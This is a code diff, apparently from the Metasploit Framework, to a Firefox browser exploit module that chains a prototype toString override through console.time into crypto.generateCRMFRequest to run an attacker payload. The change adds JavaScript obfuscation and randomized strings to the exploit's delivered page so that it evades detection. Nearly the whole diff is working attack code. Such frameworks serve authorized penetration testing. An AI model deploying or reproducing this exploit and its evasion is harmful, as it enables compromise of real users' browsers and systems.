Add some obfuscation.

Author: joevennix

modules/exploits/multi/browser/firefox_tostring_console_injection.rb

@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'rex/exploitation/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -69,28 +70,34 @@ def on_request_exploit(cli, request, target_info)
   end
 
   def generate_html(target_info)
-    opts = {
-      :payload => run_payload # defined in FirefoxPrivilegeEscalation mixin
-    }
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+    js = Rex::Exploitation::JSObfu.new(%Q|
+      var opts = #{JSON.unparse(opts)};
+      var key = opts['#{key}'];
+      var y = {}, q = false;
+      y.constructor.prototype.toString=function() {
+        if (q) return;
+        q = true;
+        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
+        return 5;
+      };
+      console.time(y);
+    |)
+
+    js.obfuscate
 
     %Q|
-       <!doctype html>
-       <html>
-         <body>
-           <script>
-             var opts = #{JSON.unparse(opts)};
-             var y = {};
-             y.constructor.prototype.toString=function() {
-               if (window.q) return;
-               window.q = true;
-               crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
-               return 5;
-             };
-             console.time(y);
-           </script>
-           #{datastore['CONTENT']}
-         </body>
-       </html>
+      <!doctype html>
+      <html>
+        <body>
+          <script>
+            #{js}
+          </script>
+          #{datastore['CONTENT']}
+        </body>
+      </html>
     |
   end
 end